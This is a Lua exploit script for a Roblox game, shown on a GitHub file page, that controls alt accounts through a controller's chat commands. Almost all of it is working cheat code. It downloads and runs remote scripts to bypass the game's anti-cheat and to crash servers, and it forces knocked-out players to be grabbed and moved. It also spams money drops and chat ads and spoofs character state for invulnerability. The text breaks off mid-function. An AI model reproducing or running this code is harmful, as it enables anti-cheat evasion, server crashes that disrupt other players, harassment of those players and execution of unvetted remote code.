-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathALT-CONTROL
905 lines (838 loc) · 33.6 KB
/
ALT-CONTROL
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
local Testing = false
-- Cmds
if table.find(getgenv().Droppers,game.Players.LocalPlayer.UserId) then
getgenv().PointInTable = table.find(getgenv().Droppers,game.Players.LocalPlayer.UserId)
else
return
end
if game.Players.LocalPlayer.Name == getgenv().Controller or getgenv().Executed then
return
end
UserSettings().GameSettings.MasterVolume = 0
local Crashed = false
if Testing == false then
main = Instance.new("ScreenGui")
Frame = Instance.new("Frame")
TextLabel = Instance.new("TextLabel")
TextLabel_2 = Instance.new("TextLabel")
TextLabel_3 = Instance.new("TextLabel")
main.Name = "RenderScreen"
main.Parent = game.CoreGui
main.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
main.IgnoreGuiInset = true
Frame.Parent = main
Frame.Active = true
Frame.AnchorPoint = Vector2.new(0.5, 0.5)
Frame.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Frame.Position = UDim2.new(0.5, 0, 0.5, 0)
Frame.Size = UDim2.new(1, 0, 1, 0)
TextLabel.Parent = Frame
TextLabel.AnchorPoint = Vector2.new(0.5, 0.5)
TextLabel.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.BackgroundTransparency = 1.000
TextLabel.Position = UDim2.new(0.5, 0, 0.419999987, 0)
TextLabel.Size = UDim2.new(0, 279, 0, 34)
TextLabel.Font = Enum.Font.Gotham
TextLabel.Text = "Alt-Control has successfully loaded!"
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.TextScaled = false
TextLabel.TextSize = 19.000
TextLabel.TextWrapped = false
if not game:IsLoaded() then
repeat wait(.1) until game:IsLoaded()
end
local vu = game:GetService("VirtualUser")
game:GetService("Players").LocalPlayer.Idled:connect(function()
vu:Button2Down(Vector2.new(0,0),workspace.CurrentCamera.CFrame)
wait(1)
vu:Button2Up(Vector2.new(0,0),workspace.CurrentCamera.CFrame)
end)
game:GetService("RunService"):Set3dRenderingEnabled(false)
setfpscap(5)
end
loadstring(game:HttpGet("https://raw.githubusercontent.com/MsorkyScripts/OpenSourceAntiCheat/main/AntiCheatBypass.txt"))()
getgenv().Executed = true
--// Code --//
local Connections = {}
local Services = {
["RP"] = game:GetService("ReplicatedStorage"),
["Players"] = game:GetService("Players"),
}
local Variables = {
Controller = getgenv().Controller,
Player = game.Players.LocalPlayer,
}
local Host = Services["Players"]:FindFirstChild(Variables["Controller"])
if not Host then
print("Host is not here waiting for him to join!")
Services["Players"]:WaitForChild(Variables["Controller"],9e9)
Host = Services["Players"]:FindFirstChild(Variables["Controller"])
end
print("Script loaded!")
local CmdSettings = {}
local _settings = {
debounce = .1;
size = Vector3.new(5,5,5);
offset = Vector3.new(0,1.6,0);
transparency = 1;
}
local _plr = game.Players.LocalPlayer
local _char = _plr.Character
local _hrp = _char:WaitForChild('HumanoidRootPart')
function attatch()
local _part = Instance.new('Part', _char)
_part.Anchored = true
_part.CanCollide = false
_part.Size = _settings.size
_part.Transparency = _settings.transparency
_part.CFrame = _hrp.CFrame
local _recent = { }
spawn(function()
game:GetService('RunService'):BindToRenderStep('On', Enum.RenderPriority.Camera.Value, function()
_part.CFrame = _hrp.CFrame + _settings.offset
local _parts = game.Workspace:GetPartsInPart(_part)
for i,v in pairs(_parts) do
if _recent[v] or (not v:IsDescendantOf(_char) and v.CanCollide == true) then
_recent[v] = tick()
v.CanCollide = false
end
end
end)
end)
spawn(function()
game:GetService('RunService'):BindToRenderStep('Off', Enum.RenderPriority.Camera.Value, function()
for i,v in pairs(_recent) do
if tick() - v >= _settings.debounce then
i.CanCollide = true
end
end
end)
end)
spawn(function()
repeat wait() until not _char or not _char:FindFirstChild('Humanoid') or _char.Humanoid.Health <= 0
game:GetService('RunService'):UnbindFromRenderStep('On')
game:GetService('RunService'):UnbindFromRenderStep('Off')
end)
end
_plr.CharacterAdded:connect(function(c)
_char = c
_hrp = c:WaitForChild('HumanoidRootPart')
attatch()
end)
attatch()
local function Drop(Type)
if Type == true and CmdSettings["Dropping"] == nil then
CmdSettings["Dropping"] = true
CmdSettings["CustomDrop"] = nil
CmdSettings["Aura"] = nil
while CmdSettings["Dropping"] do
local args = {
[1] = "DropMoney",
[2] = "10000"
}
game:GetService("ReplicatedStorage").MainEvent:FireServer(unpack(args))
wait(2.5)
end
elseif Type == false then
CmdSettings["Dropping"] = nil
CmdSettings["CustomDrop"] = nil
end
end
local function AirLock(Type)
if CmdSettings["AirLock"] == nil and Type == true then
local BP = Variables["Player"].Character.HumanoidRootPart:FindFirstChild("AirLockBP")
if BP then
BP:Destroy()
end
CmdSettings["AirLock"] = true
Variables["Player"].Character.HumanoidRootPart.CFrame = Variables["Player"].Character.HumanoidRootPart.CFrame*CFrame.new(0,10,0)
local BP = Instance.new("BodyPosition",Variables["Player"].Character.HumanoidRootPart)
BP.Name = "AirLockBP"
BP.MaxForce = Vector3.new(math.huge,math.huge,math.huge)
BP.Position = Variables["Player"].Character.HumanoidRootPart.Position
elseif CmdSettings["AirLock"] == true and Type == false then
CmdSettings["AirLock"] = nil
local BP = Variables["Player"].Character.HumanoidRootPart:FindFirstChild("AirLockBP")
if BP then
BP:Destroy()
end
end
end
local function GetPlayerFromString(str,ignore)
for i,Targ in pairs(game.Players:GetPlayers()) do
if not ignore and Targ == Variables["Player"] then
continue
end
if Targ.Name:lower():sub(1,#str) == str:lower() or Targ.DisplayName:lower():sub(1,#str) == str:lower() then
return Targ
end
end
return nil
end
local function BringPlr(Target,POS)
AirLock(false)
if CurrAnim and CurrAnim.IsPlaying then
CurrAnim:Stop()
end
if getgenv().PointInTable == 1 and Target.Character and Target.Character:FindFirstChild("Humanoid") then
CmdSettings["Aura"] = nil
local TargetPlr = Target
local c = game.Players.LocalPlayer.Character
local Root = c.HumanoidRootPart
local PrevCF = Root.CFrame
local TargetChar = TargetPlr.Character
if TargetPlr and AirLock and TargetPlr.Character and TargetPlr.Character:FindFirstChild("Humanoid") and not ( not c or not c:FindFirstChild("BodyEffects") or not c.BodyEffects:FindFirstChild("K.O") or not c.BodyEffects:FindFirstChild("Grabbed") or c.BodyEffects["K.O"].Value == true or c.BodyEffects.Grabbed.Value ~= nil or not TargetChar or not TargetChar:FindFirstChild("BodyEffects") or not TargetChar.BodyEffects:FindFirstChild("K.O") or TargetChar.BodyEffects["K.O"].Value == true ) then
CmdSettings["IsLocking"] = true
c.Humanoid:SetStateEnabled(Enum.HumanoidStateType.FallingDown,false)
Root.CFrame = CFrame.new(TargetChar.HumanoidRootPart.Position)*CFrame.new(0,0,1)
repeat wait()
Root.CFrame = CFrame.new(TargetChar.HumanoidRootPart.Position)*CFrame.new(0,0,1)
if not c:FindFirstChild("Combat") then
c.Humanoid:EquipTool(game.Players.LocalPlayer.Backpack.Combat)
end
c.Combat:Activate()
until not TargetPlr or not TargetChar or not c or not c:FindFirstChild("BodyEffects") or not c.BodyEffects:FindFirstChild("K.O") or not c.BodyEffects:FindFirstChild("Grabbed") or c.BodyEffects["K.O"].Value == true or c.BodyEffects.Grabbed.Value ~= nil or not TargetChar or not TargetChar:FindFirstChild("BodyEffects") or not TargetChar.BodyEffects:FindFirstChild("K.O") or TargetChar.BodyEffects["K.O"].Value == true
Root.CFrame = CFrame.new(TargetChar.LowerTorso.Position)*CFrame.new(0,3,0)
if c.BodyEffects.Grabbed.Value ~= nil then
else
if not (not TargetPlr or not TargetChar or not c or not c:FindFirstChild("BodyEffects") or not c.BodyEffects:FindFirstChild("K.O") or not c.BodyEffects:FindFirstChild("Grabbed") or c.BodyEffects["K.O"].Value == true or c.BodyEffects.Grabbed.Value ~= nil or not TargetChar or not TargetChar:FindFirstChild("BodyEffects") or not TargetChar.BodyEffects:FindFirstChild("K.O") or TargetChar.BodyEffects["K.O"].Value == false ) then
local args = {
[1] = "Grabbing",
[2] = false
}
game:GetService("ReplicatedStorage").MainEvent:FireServer(unpack(args))
end
end
repeat wait(0.35)
if not (not TargetPlr or not TargetChar or not c or not c:FindFirstChild("BodyEffects") or not c.BodyEffects:FindFirstChild("K.O") or not c.BodyEffects:FindFirstChild("Grabbed") or c.BodyEffects["K.O"].Value == true or c.BodyEffects.Grabbed.Value ~= nil or not TargetChar or not TargetChar:FindFirstChild("BodyEffects") or not TargetChar.BodyEffects:FindFirstChild("K.O") or TargetChar.BodyEffects["K.O"].Value == false ) then
Root.CFrame = CFrame.new(TargetChar.LowerTorso.Position)*CFrame.new(0,3,0)
if c.BodyEffects.Grabbed.Value ~= nil then
else
if not (not TargetPlr or not TargetChar or not c or not c:FindFirstChild("BodyEffects") or c.BodyEffects["K.O"].Value == true or c.BodyEffects.Grabbed.Value ~= nil or not TargetChar or not TargetChar:FindFirstChild("BodyEffects") or TargetChar.BodyEffects["K.O"].Value == false) then
local args = {
[1] = "Grabbing",
[2] = false
}
game:GetService("ReplicatedStorage").MainEvent:FireServer(unpack(args))
end
end
end
until not TargetPlr or not TargetChar or not c or not c:FindFirstChild("BodyEffects") or not c.BodyEffects:FindFirstChild("K.O") or not c.BodyEffects:FindFirstChild("Grabbed") or c.BodyEffects["K.O"].Value == true or c.BodyEffects.Grabbed.Value ~= nil or not TargetChar or not TargetChar:FindFirstChild("BodyEffects") or not TargetChar.BodyEffects:FindFirstChild("K.O") or TargetChar.BodyEffects["K.O"].Value == false
if POS == nil then
Root.CFrame = Host.Character.HumanoidRootPart.CFrame
else
Root.CFrame = POS
end
CmdSettings["IsLocking"] = nil
wait(1.5)
local args = {
[1] = "Grabbing",
[2] = false
}
game:GetService("ReplicatedStorage").MainEvent:FireServer(unpack(args))
end
end
end
local BringLocations = {
["bank"] = CFrame.new(-396.988922, 21.7570763, -293.929779, -0.102468058, -1.9584887e-09, -0.994736314, 7.23731564e-09, 1, -2.71436984e-09, 0.994736314, -7.47735651e-09, -0.102468058),
["admin"] = CFrame.new(-872.453674, -32.6421318, -532.476379, 0.999682248, -1.36019978e-08, 0.0252073351, 1.33811247e-08, 1, 8.93094043e-09, -0.0252073351, -8.59080007e-09, 0.999682248),
["klub"] = CFrame.new(-264.434479, 0.0355005264, -430.854736, -0.999828756, 9.58909574e-09, -0.0185054261, 9.92017934e-09, 1, -1.77993904e-08, 0.0185054261, -1.79799198e-08, -0.999828756),
["vault"] = CFrame.new(-495.485901, 23.1428547, -284.661713, -0.0313318223, -4.10440322e-08, 0.999509037, 2.18453966e-08, 1, 4.17489829e-08, -0.999509037, 2.31427428e-08, -0.0313318223),
["train"] = CFrame.new(591.396118, 34.5070686, -146.159561, 0.0698467195, -4.91725913e-08, -0.997557759, 5.03374231e-08, 1, -4.57684664e-08, 0.997557759, -4.70177071e-08, 0.0698467195),
}
local SetupsTable = {
Bank = {
Origin = CFrame.new(-386.826202, 21.2503242, -325.340912, 0.998742342, 0, -0.0501373149, 0, 1, 0, 0.0501373149, 0, 0.998742342)*CFrame.new(0,0,-3),
ZMultiplier = 3,
XMultiplier = 8,
PerRow = 10,
Rows = 4,
},
Admin = {
Origin = CFrame.new(-884.12915, -38.3972931, -545.291809, -0.99998939, 2.69316498e-08, -0.00460755778, 2.6944301e-08, 1, -2.68358624e-09, 0.00460755778, -2.80770518e-09, -0.99998939),
ZMultiplier = 3,
XMultiplier = 8,
PerRow = 10,
Rows = 4,
},
Klub = {
Origin = CFrame.new(-237.016571, -4.87585974, -411.940063, 0.994918466, -1.5840282e-08, -0.100683607, 6.8329018e-09, 1, -8.9807088e-08, 0.100683607, 8.86627731e-08, 0.994918466),
ZMultiplier = 6,
XMultiplier = -12,
PerRow = 10,
Rows = 4,
},
Vault = {
Origin = CFrame.new(-519.201355, 23.1994667, -292.362, -0.0597927198, 6.70288927e-08, -0.998210788, 2.96872589e-08, 1, 6.53707701e-08, 0.998210788, -2.57254467e-08, -0.0597927198),
ZMultiplier = -2.5,
XMultiplier = 4,
PerRow = 10,
Rows = 4,
},
Train = {
Origin = CFrame.new(606.527588, 34.5070801, -159.083542, 0.0376962014, -7.60452892e-08, 0.999289274, 6.54496404e-08, 1, 7.36304173e-08, -0.999289274, 6.26275352e-08, 0.0376962014),
ZMultiplier = 5,
XMultiplier = -7,
PerRow = 10,
Rows = 4,
}
}
local function Setup(Type,Debugmode)
CmdSettings["Aura"] = nil
if Debugmode then
for PointInTable = 1,40 do
local Table = SetupsTable[Type]
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = Table["Origin"]
local XAxis
local ZAxis
local i
if PointInTable <= 10 then
i = 1
elseif PointInTable <= 20 then
i = 2
elseif PointInTable <= 30 then
i = 3
elseif PointInTable <= 40 then
i = 4
end
if i == 1 then
if PointInTable <= Table["PerRow"] then
XAxis = 0
if PointInTable == 1 then
ZAxis = 0
else
ZAxis = (PointInTable-1)*Table["ZMultiplier"]
end
end
else
local index = i*Table["PerRow"]
if (Table["PerRow"]*i) >= PointInTable then
XAxis = (i-1)*Table["XMultiplier"]
ZAxis = (i*Table["PerRow"]-PointInTable)*Table["ZMultiplier"]
end
end
game.Players.LocalPlayer.Character.Archivable = true
local clone = game.Players.LocalPlayer.Character:Clone()
clone.Parent = workspace
clone.HumanoidRootPart.CFrame = Table["Origin"]*CFrame.new(XAxis,0,ZAxis)
end
else
local Table = SetupsTable[Type]
local PointInTable = getgenv().PointInTable
local XAxis
local ZAxis
local i
if PointInTable <= 10 then
i = 1
elseif PointInTable <= 20 then
i = 2
elseif PointInTable <= 30 then
i = 3
elseif PointInTable <= 40 then
i = 4
end
if i == 1 then
if PointInTable <= Table["PerRow"] then
XAxis = 0
if PointInTable == 1 then
ZAxis = 0
else
ZAxis = (PointInTable-1)*Table["ZMultiplier"]
end
end
else
local index = i*Table["PerRow"]
if (Table["PerRow"]*i) >= PointInTable then
XAxis = (i-1)*Table["XMultiplier"]
ZAxis = (i*Table["PerRow"]-PointInTable)*Table["ZMultiplier"]
end
end
Variables["Player"].Character.HumanoidRootPart.CFrame = Table["Origin"]*CFrame.new(XAxis,0,ZAxis)
end
end
local function ShowWallet()
local Player = game.Players.LocalPlayer
if Player.Backpack:FindFirstChild("Wallet") then
Player.Character.Humanoid:EquipTool(Player.Backpack.Wallet)
end
end
local function RemoveWallet()
local Player = game.Players.LocalPlayer
if Player.Character:FindFirstChild("Wallet") then
Player.Character.Humanoid:UnequipTools()
end
end
local CurrAnim
local AbbreviationOptions = {
["k"] = 1000,
["m"] = 1000000
}
local function GetNumberFromText(str)
str = string.lower(str)
if str:find("k") then
local newStr = string.gsub(str, "k", "")
return tonumber(newStr)*AbbreviationOptions["k"]
elseif str:find("m") then
local newStr = string.gsub(str, "m", "")
return tonumber(newStr)*AbbreviationOptions["m"]
end
return tonumber(str)
end
local DropFolder = workspace.Ignored:FindFirstChild("Drop")
local function Initiate()
CurrAnim = nil
for Index,Var in pairs(CmdSettings) do
CmdSettings[Var] = nil
end
CmdSettings = {}
for Index,Connection in pairs(Connections) do
Index[Connection] = nil
Connection:Disconnect()
end
Connections["OnChat"] = game.ReplicatedStorage.DefaultChatSystemChatEvents.OnMessageDoneFiltering.OnClientEvent:Connect(function(data)
local Message = data.Message
local plr = game:service"Players"[data.FromSpeaker]
if plr.Name ~= getgenv().Controller then
return
end
Message = string.lower(Message)
local Args = string.split(Message," ")
local AmountOfArgs = #Args
if Host and not Crashed and Variables["Player"].Character and Variables["Player"].Character:FindFirstChild("HumanoidRootPart") and Variables["Player"].Character:FindFirstChild("Humanoid") and Variables["Player"].Character.Humanoid.Health > 0 then
if Args[1] == ""..AltControl['Commands'].Drop then
Drop(true)
elseif not CmdSettings["AdOn"] and Message == ""..AltControl['Commands'].SetAd then
CmdSettings["AdOn"] = true
while CmdSettings["AdOn"] do
game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(""..getgenv().Message, "All")
wait(1.5)
end
elseif Args[1] == ""..AltControl['Commands'].SetAd and Args[2] == "off" then
CmdSettings["AdOn"] = nil
elseif Message == ".loopdel" then
if DropFolder then
DropFolder:Destroy()
DropFolder = nil
end
elseif Message == ""..AltControl['Commands'].Circle and Host and Host.Character and Host.Character:FindFirstChild("Humanoid") and Host.Character.Humanoid.Health > 0 then
AirLock(false)
local angle = 0
local cfr = Host.Character.HumanoidRootPart.CFrame*CFrame.new(0,1,0)
local Index = 0
local size = 3
local PointInTable = getgenv().PointInTable
local ZAxis
local angle = 0
if PointInTable <= 10 then
ZAxis = 2
angle = (10-PointInTable)
elseif PointInTable <= 20 then
ZAxis = -1
angle = (20-PointInTable)
elseif PointInTable <= 30 then
ZAxis = -4
angle = (30-PointInTable)
elseif PointInTable <= 40 then
ZAxis = -8
angle = (40-PointInTable)
end
angle = angle*36
local Clone = game.Players.LocalPlayer.Character
Clone.HumanoidRootPart.CFrame = cfr * CFrame.fromEulerAnglesXYZ(0,math.rad(angle),0) * CFrame.new(0,-size,-10)
Clone.HumanoidRootPart.CFrame=Clone.HumanoidRootPart.CFrame*CFrame.new(0,0,2)
Clone.HumanoidRootPart.CFrame=Clone.HumanoidRootPart.CFrame*CFrame.Angles(0,math.rad(180),0)
elseif Args[1] == ""..AltControl['Commands'].Crash and Args[2] == "swag" and not Crashed then
local Player = GetPlayerFromString(Args[3],true)
if Player and Player == game.Players.LocalPlayer then
if game.CoreGui:FindFirstChild("RenderScreen") then
game.CoreGui.RenderScreen:Destroy()
end
game:GetService("RunService"):Set3dRenderingEnabled(true)
Crashed = true
loadstring(game:HttpGet('https://raw.githubusercontent.com/lerkermer/lua-projects/master/SuperCustomServerCrasher'))()
for Index,Var in pairs(CmdSettings) do
CmdSettings[Var] = nil
end
CmdSettings = {}
setfpscap(60)
wait(1)
setfpscap(60)
wait(1)
setfpscap(60)
wait(1)
setfpscap(60)
end
elseif Args[1] == ""..AltControl['Commands'].Crash and Args[2] == "encrypt" and not Crashed then
local Player = GetPlayerFromString(Args[3],true)
if Player and Player == game.Players.LocalPlayer then
if game.CoreGui:FindFirstChild("RenderScreen") then
game.CoreGui.RenderScreen:Destroy()
end
game:GetService("RunService"):Set3dRenderingEnabled(true)
Crashed = true
loadstring(game:HttpGet("https://raw.githubusercontent.com/remorseW/encryptW/main/CustomEncryptCrasher.lua"))()
for Index,Var in pairs(CmdSettings) do
CmdSettings[Var] = nil
end
CmdSettings = {}
setfpscap(60)
wait(1)
setfpscap(60)
wait(1)
setfpscap(60)
wait(1)
setfpscap(60)
end
elseif Args[1] == ""..AltControl['Commands'].Crash and Args[2] == "bdhc" and not Crashed then
local Player = GetPlayerFromString(Args[3],true)
if Player and Player == game.Players.LocalPlayer then
if game.CoreGui:FindFirstChild("RenderScreen") then
game.CoreGui.RenderScreen:Destroy()
end
game:GetService("RunService"):Set3dRenderingEnabled(true)
Crashed = true
loadstring(game:HttpGet('https://raw.githubusercontent.com/BetterDaHood/BetterDaHoodCrasher/main/Crash'))()
for Index,Var in pairs(CmdSettings) do
CmdSettings[Var] = nil
end
CmdSettings = {}
setfpscap(60)
wait(1)
setfpscap(60)
wait(1)
setfpscap(60)
wait(1)
setfpscap(60)
end
elseif Args[1] == ""..AltControl['Commands'].Drop and Args[2] == "off" then
Drop(false)
elseif Args[1] == ""..AltControl['Commands'].Reset then
if Variables["Player"].Character then
local FULLY_LOADED_CHAR = Variables["Player"].Character:FindFirstChild("FULLY_LOADED_CHAR")
if FULLY_LOADED_CHAR then
FULLY_LOADED_CHAR.Parent = Services["RP"]
FULLY_LOADED_CHAR:Destroy()
end
Variables["Player"].Character:Destroy()
end
Initiate()
elseif Args[1] == ""..AltControl['Commands'].Reset then
local Player = GetPlayerFromString(Args[2],true)
if Player and Player == game.Players.LocalPlayer then
if Variables["Player"].Character then
local FULLY_LOADED_CHAR = Variables["Player"].Character:FindFirstChild("FULLY_LOADED_CHAR")
if FULLY_LOADED_CHAR then
FULLY_LOADED_CHAR.Parent = Services["RP"]
FULLY_LOADED_CHAR:Destroy()
end
Variables["Player"].Character:Destroy()
end
Initiate()
end
elseif Message == ""..AltControl['Commands'].Airlock then
AirLock(true)
elseif Message == ""..AltControl['Commands'].BringPlr then
AirLock(false)
-- didnt feel the need for a function lmao
if Host and Host.Character and Host.Character:FindFirstChild("HumanoidRootPart") then
Variables["Player"].Character.HumanoidRootPart.CFrame = Host.Character.HumanoidRootPart.CFrame*CFrame.new(0,0,-1)
end
elseif Args[1] == ""..AltControl['Commands'].BringPlr and Args[2] == "host" and BringLocations[string.lower(Args[3])] then
BringPlr(Host,BringLocations[string.lower(Args[3])])
elseif Args[1] == ""..AltControl['Commands'].BringPlr and BringLocations[string.lower(Args[3])] then
local FoundPlayer = GetPlayerFromString(Args[2])
if FoundPlayer then
BringPlr(FoundPlayer,BringLocations[string.lower(Args[3])])
end
elseif Args[1] == ""..AltControl['Commands'].BringPlr and Args[3] == "host" then
local FoundPlayer = GetPlayerFromString(Args[2])
if FoundPlayer then
BringPlr(FoundPlayer,nil)
end
elseif Args[1] == ""..AltControl['Commands'].Setup and Args[2] == "bank" then
Setup("Bank")
elseif Args[1] == ""..AltControl['Commands'].Setup and Args[2] == "admin" then
Setup("Admin")
elseif Args[1] == ""..AltControl['Commands'].Setup and Args[2] == "club" then
Setup("Klub")
elseif Args[1] == ""..AltControl['Commands'].Setup and Args[2] == "vault" then
Setup("Vault")
elseif Args[1] == ""..AltControl['Commands'].Setup and Args[2] == "train" then
Setup("Train")
elseif Message == ""..AltControl['Commands'].Wallet then
ShowWallet()
elseif Args[1] == ""..AltControl['Commands'].Airlock and Args[2] == "off" then
AirLock(false)
elseif Args[1] == ""..AltControl['Commands'].Wallet and Args[2] == "off" then
RemoveWallet()
elseif Args[1] == ""..AltControl['Commands'].CustomDrop and Args[2] == "off" then
Drop(false)
elseif Args[1] == ""..AltControl['Commands'].Freeze and Args[2] == "off" then
local LocalPlayer = game:GetService("Players").LocalPlayer
local Character = LocalPlayer.Character
local HumanoidRootPart = Character:FindFirstChild("HumanoidRootPart")
HumanoidRootPart.Anchored = false
wait(10)
HumanoidRootPart.Anchored = false
elseif Args[1] == ""..AltControl['Commands'].FistBlock and Args[2] == "off" then
player.Character.BodyEffects.Block:Destroy()
elseif Args[1] == ""..AltControl['Commands'].SetFps and string.match(Args[2], "%d") then
setfpscap(Args[2])
elseif Args[1] == ""..AltControl['Commands'].Rejoin then
local Player = GetPlayerFromString(Args[2],true)
if Player and Player == game.Players.LocalPlayer then
game:GetService('TeleportService'):TeleportToPlaceInstance(game.PlaceId, game.JobId, game.Players.LocalPlayer)
end
elseif Message == ""..AltControl['Commands'].FistBlock then
MainEvent = game:GetService('ReplicatedStorage').MainEvent
player = game.Players.LocalPlayer;
MainEvent:FireServer('Block', player.Name)
elseif Message == ""..AltControl['Commands'].Freeze then
local LocalPlayer = game:GetService("Players").LocalPlayer
local Character = LocalPlayer.Character
local HumanoidRootPart = Character:FindFirstChild("HumanoidRootPart")
HumanoidRootPart.Anchored = true
wait(10)
HumanoidRootPart.Anchored = false
elseif Message == ""..AltControl['Commands'].GodMode then
local Client = game:GetService"Players".LocalPlayer
-- dedos
local localPlayer = game:GetService('Players').LocalPlayer;
local localCharacter = localPlayer.Character;
localCharacter:FindFirstChildWhichIsA('Humanoid').Health = 0;
for _,v in pairs(localPlayer.Character:GetChildren()) do
if v:IsA('MeshPart') or v:IsA('Accessory') then
v:Destroy();
end;
end;
local newCharacter = localPlayer.CharacterAdded:Wait();
local spoofFolder = Instance.new('Folder');
spoofFolder.Name = 'FULLY_LOADED_CHAR';
spoofFolder.Parent = newCharacter;
newCharacter:WaitForChild('RagdollConstraints'):Destroy();
newCharacter:WaitForChild('BodyEffects'):WaitForChild('Armor'):Destroy();
local spoofValue = Instance.new('BoolValue', newCharacter);
spoofValue.Name = 'RagdollConstraints';
local armValue = Instance.new('IntValue', game:GetService('Players').LocalPlayer.Character:FindFirstChild('BodyEffects'));
armValue.Name = 'Armor';
wait(0.3)
if Host and Host.Character and Host.Character:FindFirstChild("HumanoidRootPart") then
Variables["Player"].Character.HumanoidRootPart.CFrame = Host.Character.HumanoidRootPart.CFrame*CFrame.new(0,0,-1)
end
elseif Message == ""..AltControl['Commands'].Rejoin then
game:GetService('TeleportService'):TeleportToPlaceInstance(game.PlaceId, game.JobId, game.Players.LocalPlayer)
elseif Args[1] == ""..AltControl['Commands'].GodMode then
local Player = GetPlayerFromString(Args[2],true)
if Player and Player == game.Players.LocalPlayer then
local Client = game:GetService"Players".LocalPlayer
-- dedos
local localPlayer = game:GetService('Players').LocalPlayer;
local localCharacter = localPlayer.Character;
localCharacter:FindFirstChildWhichIsA('Humanoid').Health = 0;
for _,v in pairs(localPlayer.Character:GetChildren()) do
if v:IsA('MeshPart') or v:IsA('Accessory') then
v:Destroy();
end;
end;
local newCharacter = localPlayer.CharacterAdded:Wait();
local spoofFolder = Instance.new('Folder');
spoofFolder.Name = 'FULLY_LOADED_CHAR';
spoofFolder.Parent = newCharacter;
newCharacter:WaitForChild('RagdollConstraints'):Destroy();
newCharacter:WaitForChild('BodyEffects'):WaitForChild('Armor'):Destroy();
local spoofValue = Instance.new('BoolValue', newCharacter);
spoofValue.Name = 'RagdollConstraints';
local armValue = Instance.new('IntValue', game:GetService('Players').LocalPlayer.Character:FindFirstChild('BodyEffects'));
armValue.Name = 'Armor';
wait(0.3)
if Host and Host.Character and Host.Character:FindFirstChild("HumanoidRootPart") then
Variables["Player"].Character.HumanoidRootPart.CFrame = Host.Character.HumanoidRootPart.CFrame*CFrame.new(0,0,-1)
end
end
elseif Args[1] == ""..AltControl['Commands'].Emote and Args[2] == "dolphin" then
if CurrAnim and CurrAnim.IsPlaying then
CurrAnim:Stop()
end
local Anim = Instance.new("Animation")
Anim.AnimationId = "http://www.roblox.com/asset/?id=5918726674"
CurrAnim = game.Players.LocalPlayer.Character.Humanoid.Animator:LoadAnimation(Anim)
CurrAnim:Play()
CurrAnim:AdjustSpeed()
elseif Args[1] == ""..AltControl['Commands'].Emote and Args[2] == "updown" then
if CurrAnim and CurrAnim.IsPlaying then
CurrAnim:Stop()
end
local Anim = Instance.new("Animation")
Anim.AnimationId = "http://www.roblox.com/asset/?id=10714174918"
